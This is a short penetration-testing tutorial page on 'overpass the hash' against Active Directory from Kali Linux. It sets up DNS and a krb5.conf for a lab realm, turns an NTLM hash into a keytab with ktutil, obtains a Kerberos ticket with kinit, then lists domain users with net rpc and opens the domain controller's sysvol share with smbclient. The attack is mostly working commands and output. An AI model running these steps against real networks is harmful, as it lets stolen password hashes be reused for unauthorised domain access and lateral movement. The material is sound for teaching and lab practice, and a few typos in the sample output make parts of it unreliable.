Overpass Kerberos

Overpass the Hash with Kali

Source: https://twitter.com/passingthehash/status/737035748445171713

Make sure that `/etc/resolv.conf` is pointed at the Domain Controller

root@kali:~# cat /etc/resolv.conf

# Generated by NetworkManager
nameserver 10.0.0.1

Then set up your /etc/krb5.conf file:

[libdefaults]
 default_realm = EXPLOITS.COM
 default_tgs_enctypes = aes256-cts aes128-cts arcfour-hmac-md5 des-cbc-md5 des-cbc-crc
 default_tkt_enctypes = aes256-cts aes128-cts arcfour-hmac-md5 des-cbc-md5 des-cbc-crc
 permitted_enctypes = aes256-cts aes128-cts arcfour-hmac-md5 des-cbc-md5 des-cbc-crc
 dns_lookup_realm = true
 dns_lookup_kdc = true
 passwd_check_s_address = false
 noaddresses = true
 udp_preference_limit = 1
 ccache_type = 3
 kdc_timesync = 0
 kdc_timesync = 0
[domain_realm]
 dc1.exploits.com = EXPLOITS.COM
 .exploits.com = EXPLOITS.COM
 exploits.com = EXPLOITS.COM
[realms]
EXPLOITS.COM = {
 kdc = dc1.exploits.com:88
 master_kdc = dc1.exploits.com:88
 kpasswd = dc1.exploits.com:464
 kpasswd_server = dc1.exploits.com:464
}

And you are ready to create your keys:

root@kali:~# ktutil -k testkey add -p user1@EXPLOITS.COM -e arcfour-hmac-md5 -w 0c1f997a0830bbfb8167f49b1ed59d15 --hex -V 5

root@kali:~# kinit -t testkey user1@EXPLOITS.COM

root@kali:~# klist -v
Credentials cache: FILE:/tmp/krb5cc_0
        Principal: user1@EXPLOITS.COM
    Cache version: 4

Server: krbtgt@EXPLOITS.COM@EXPLOIT.COM
Client: user1@EXPLOITS.COM
Ticket etype: aes256-cts-hmac-sha1-96, kvno 2
Session key: arcfour-hmac-md5
Ticket length: 973
Auth time: May 29 17:34:06 2016
End time:  May 30 03:34:06 2016
Ticket flags: pre-authent, initial, forwardable
Addresses: addressless

root@kali:~# net rpc -k usre -S dc1.exploits.com
Administrator
Guest
krbtgt
skip
user1
user3

root@kali:~# smbclient -k //dc1.exploits.com/sysvol
OS=[Windows Server 2008 R2 Enterprise 7601 Service Pack 1] Server=[Windows Server 2008 R2 Enterprise 6.1]
smb: \>
Want to contribute? Get in touch!
Last updated on 5th Jul 2017